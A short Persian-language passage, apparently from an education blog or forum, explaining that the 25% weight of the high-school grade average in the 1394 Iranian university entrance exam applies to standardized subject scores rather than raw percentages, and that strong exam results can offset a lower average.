دوستان اینا مثال هایی بود که ملتفت بشین تاثیر چیجوریاس. ولی تو کنکور درصد درس ضرب در ۷۵% نمیشه.. ترازشه که ضرب در ۷۵% میشه. راجع به محاسبه تراز هم اینجا توضیح دادم.

کلا مطلب فوق برای سادگی فهم شما بیان شده وگرنه تاثیر معدل در کنکور به این سادگی ها نیست و هر درس به طور جداگانه تاثیر خود را اعمال می کند. مثل برای درصد ریاضیتون یه تراز تعیین میشه برای نمره ی کتبی ریاضی تون هم یه تراز و اونوقت طبق فرمول بالا دو نمره برای شما به دست میاد …

کلیت امر:

معدل همه چیز نیست . شما میتونین با درصدهای خوب خودتون تاثیر معدل در کنکور ۹۴ رو کم کنین. تاثیر معدل در کنکور ۹۴ درسته ۲۵% هستش ولی محاسباتش پیچیده است و بر اساس تراز و … هست و لذا بین کسی که مثلا ۱۵ میشه نهایی با کسی که ۲۰ میشه اونقدرا فاصله ای نیست.

sig